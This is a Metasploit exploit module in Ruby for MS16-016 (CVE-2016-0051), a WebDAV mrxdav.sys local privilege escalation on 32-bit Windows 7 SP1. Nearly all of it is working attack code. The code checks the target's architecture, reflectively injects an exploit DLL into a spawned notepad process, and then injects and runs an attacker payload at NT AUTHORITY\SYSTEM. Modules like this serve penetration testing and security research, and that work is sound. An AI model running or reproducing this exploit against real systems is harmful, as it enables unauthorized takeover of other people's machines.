MS16-016 mrxdav.sys WebDav Local Privilege Escalation

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'msf/core/post/windows/reflective_dll_injection'  
require 'rex'  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Windows::Priv  
include Msf::Post::Windows::Process  
include Msf::Post::Windows::FileInfo  
include Msf::Post::Windows::ReflectiveDLLInjection  
  
def initialize(info={})  
super(update_info(info, {  
'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',  
'Description' => %q{  
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn  
a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing  
the specified payload within the context of the elevated process.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Tamas Koczka', # Original Exploit  
'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module  
],  
'Arch' => ARCH_X86,  
'Platform' => 'win',  
'SessionTypes' => [ 'meterpreter' ],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'DisablePayloadHandler' => 'false'  
},  
'Targets' =>  
[  
[ 'Windows 7 SP1', { } ]  
],  
'Payload' =>  
{  
'Space' => 4096,  
'DisableNops' => true  
},  
'References' =>  
[  
[ 'CVE', '2016-0051' ],  
[ 'MSB', 'MS16-016' ]  
],  
'DisclosureDate' => 'Feb 09 2016',  
'DefaultTarget' => 0  
}))  
end  
  
def check  
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/  
return Exploit::CheckCode::Safe  
end  
  
Exploit::CheckCode::Detected  
end  
  
def exploit  
if is_system?  
fail_with(Failure::None, 'Session is already elevated')  
end  
  
if sysinfo["Architecture"] =~ /wow64/i  
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")  
elsif sysinfo["Architecture"] =~ /x64/  
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")  
end  
  
print_status("Launching notepad to host the exploit...")  
notepad_process_pid = cmd_exec_get_pid("notepad.exe")  
begin  
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)  
print_good("Process #{process.pid} launched.")  
rescue Rex::Post::Meterpreter::RequestError  
print_status("Operation failed. Hosting exploit in the current process...")  
process = client.sys.process.open  
end  
  
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")  
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")  
library_path = ::File.expand_path(library_path)  
exploit_mem, offset = inject_dll_into_process(process, library_path)  
print_status("Exploit injected ... injecting payload into #{process.pid}...")  
payload_mem = inject_into_process(process, payload.encoded)  
thread = process.thread.create(exploit_mem + offset, payload_mem)  
sleep(3)  
print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")  
end  
end  
  
`